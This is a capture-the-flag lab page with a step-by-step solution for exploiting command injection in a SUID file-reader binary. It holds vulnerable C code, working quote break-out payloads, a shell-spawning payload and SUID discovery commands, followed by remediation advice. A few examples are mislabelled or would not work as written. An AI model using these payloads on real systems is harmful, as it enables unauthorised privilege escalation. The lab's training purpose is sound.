Avatar

Labs / SUID Privilege Hunter

  • Challenge
  • Released 08 Sep 2025

🔐 Can you exploit SUID binaries to escalate your privileges?

A secure file management system uses special privileged binaries to safely access system files, but when security meets convenience, vulnerabilities often emerge. 🎯 Can you discover how a helpful file reader becomes your gateway to elevated privileges? Time to hunt for those dangerous SUID bits and turn system administration tools against themselves! 🔍

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🔐 SUID Privilege Hunter - Complete Privilege Escalation Solution

Objective: Exploit a vulnerable SUID binary in a web application to escalate privileges from webuser to flaguser and retrieve the flag from a protected file.
🔍 Step 1: Understanding SUID Binaries

SUID (Set User ID) is a special file permission that allows a program to run with the privileges of the file owner rather than the user executing it. When the SUID bit is set on an executable owned by root or another privileged user, it can become a powerful privilege escalation vector if the binary contains vulnerabilities.

SUID Bit Identification:
# Check for SUID bit (s in owner execute position)
ls -la /usr/local/bin/file_reader
-rwsr-xr-x 1 root root 16832 Sep 8 12:00 /usr/local/bin/file_reader

The 's' indicates SUID is set - this binary runs as root and switches to flaguser internally
🔍 Step 2: Application Analysis

Navigate to to access the SecureFile System. The application provides:

  • Authentication System: Login with provided credentials
  • File Reader Tool: Interface to a privileged file reading utility
  • SUID Binary: /usr/local/bin/file_reader (runs as flaguser)

Available Credentials:

  • Guest Access: username: guest, password: guest123
  • Web User Access: username: webuser, password: webpass123
🔍 Step 3: Initial Reconnaissance

Log in to the application using either set of credentials and explore the File Reader tool:

  1. Navigate to the Dashboard after logging in
  2. Access the "File Reader Tool"
  3. Test basic functionality by reading common files like /etc/passwd
  4. Observe that the tool successfully reads files with elevated privileges
# Test normal file reading
File Path: /etc/passwd

# Expected output shows system users including flaguser
🔍 Step 4: Vulnerability Analysis

The SUID binary /usr/local/bin/file_reader contains a critical command injection vulnerability. Analysis of the binary reveals:

// Vulnerable C code in file_reader binary
snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
system(command);

// This directly concatenates user input into a system() call

Vulnerability Details:

  • Command Injection: User input is directly incorporated into system() call
  • No Input Sanitization: Special characters and command separators are not filtered
  • SUID Execution: Commands execute with flaguser privileges
  • Shell Metacharacters: Semicolons, pipes, and other operators can be injected
🔍 Step 5: Command Injection Techniques
Semicolon Injection
# Inject additional commands
/etc/passwd; id

# Results in: cat /etc/passwd; id
# Executes both commands as flaguser
Command Substitution
# Use command substitution
/etc/passwd; whoami

# Results in: cat /etc/passwd; whoami
# Shows current effective user (flaguser)
🔍 Step 6: Privilege Escalation Attack

The most effective approach is to use command injection to execute commands as flaguser:

Working Payload:
File Path: /etc/passwd"; cat /home/flaguser/flag.txt; echo "

How this works:

  1. The application passes the filename as an argument to the SUID binary
  2. The binary receives: /etc/passwd"; cat /home/flaguser/flag.txt; echo "
  3. The binary constructs: cat "/etc/passwd"; cat /home/flaguser/flag.txt; echo ""
  4. The double quote closes the cat command, semicolon allows command chaining
  5. The system() call executes all commands with flaguser privileges
  6. The flag file is readable because the command runs as flaguser
🔍 Step 7: Step-by-Step Exploitation
Web Interface Method
  1. Log in to the application
  2. Navigate to File Reader tool
  3. Enter payload: /etc/passwd"; cat /home/flaguser/flag.txt; echo "
  4. Click "Read File"
  5. Observe both /etc/passwd contents and the flag in output
Direct Binary Access
# If you have shell access to the container
/usr/local/bin/file_reader "/etc/passwd; cat /home/flaguser/flag.txt"

# Expected output includes the flag
🔍 Step 8: Alternative Injection Techniques
Pipe Injection
# Using pipes
/dev/null | cat /home/flaguser/flag.txt

# Results in: cat /dev/null | cat /home/flaguser/flag.txt
AND Operator
# Using && operator
/etc/passwd && cat /home/flaguser/flag.txt

# Executes second command if first succeeds
Background Execution
# Using background execution
/etc/passwd & cat /home/flaguser/flag.txt

# Runs commands in parallel
🔍 Step 9: Advanced Exploitation Techniques

For more sophisticated attacks, you can use the SUID binary for various privilege escalation scenarios:

Shell Spawning
# Spawn a shell as flaguser
/etc/passwd; /bin/sh

# Note: This may not work in web interface
# but demonstrates the concept
File System Exploration
# Explore flaguser's directory
/etc/passwd; ls -la /home/flaguser/

# Find additional sensitive files
🔍 Step 10: Understanding the Vulnerability

The vulnerability exists because:

// VULNERABLE: Direct string concatenation in C
int main(int argc, char *argv[]) {
char command[512];
snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
system(command); // DANGEROUS: Executes shell with user input
return 0;
}

Key vulnerability factors:

  • Direct String Concatenation: User input directly incorporated into command
  • No Input Validation: No checks for shell metacharacters
  • system() Usage: Executes commands through shell, enabling injection
  • SUID Privileges: Commands execute with elevated privileges
🔍 Step 11: Burp Suite Exploitation

Using Burp Suite for systematic testing:

  1. Configure browser to use Burp proxy
  2. Navigate to the File Reader tool
  3. Intercept the POST request when submitting a filename
  4. Send the request to Repeater
  5. Modify the filename parameter to include command injection payloads
  6. Test various injection techniques systematically
  7. Analyze responses for successful command execution
🔍 Step 12: SUID Binary Discovery Techniques

In real penetration tests, you would first need to discover SUID binaries:

# Find all SUID binaries on the system
find / -type f -perm -4000 2>/dev/null

# Find SUID binaries owned by specific user
find / -type f -perm -4000 -user flaguser 2>/dev/null

# Check specific binary permissions
ls -la /usr/local/bin/file_reader

# Identify potentially vulnerable binaries
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null | grep -E "(cat|less|more|tail|head|vim|nano)"
🔍 Step 13: Security Implications

SUID binary vulnerabilities can lead to:

  • Privilege Escalation: Gain access to higher-privileged accounts
  • System Compromise: Execute commands as privileged users
  • Data Exfiltration: Access sensitive files and information
  • Persistence: Create backdoors with elevated privileges
  • Lateral Movement: Use elevated access to compromise other systems
  • System Administration: Perform administrative tasks without proper authorization
🔍 Step 14: Remediation Strategies

To prevent SUID binary vulnerabilities:

  • Input Validation: Strictly validate and sanitize all user input
  • Avoid system(): Use execve() or similar functions instead of system()
  • Principle of Least Privilege: Minimize SUID binary usage
  • Code Review: Regular security audits of privileged binaries
  • Static Analysis: Use tools to detect potential command injection
  • Sandboxing: Run privileged operations in restricted environments
  • Regular Audits: Periodically review all SUID binaries on systems
Secure Coding Practices:
• Use parameterized execution methods
• Implement strict input validation
• Avoid shell interpretation of user input
• Use whitelist-based input filtering
• Implement proper error handling
🔍 Step 15: Real-World Applications

This challenge demonstrates:

  • Common Vulnerability Pattern: SUID binaries with command injection are frequently found in real systems
  • Privilege Escalation Methodology: Standard approach used in penetration testing
  • System Administration Risks: How convenience features can introduce security vulnerabilities
  • Defense Evasion: Techniques for exploiting trusted system utilities
Flag Location: The flag is stored in /home/flaguser/flag.txt and can be accessed by exploiting the command injection vulnerability in the SUID binary to execute commands as flaguser. The complete attack chain: Login → Access File Reader → Inject Commands → Escalate to flaguser → Read Flag.
Real-World Context: This challenge is based on actual SUID binary vulnerabilities commonly found during penetration tests and security assessments. The command injection technique demonstrated is a fundamental privilege escalation method in Linux environments.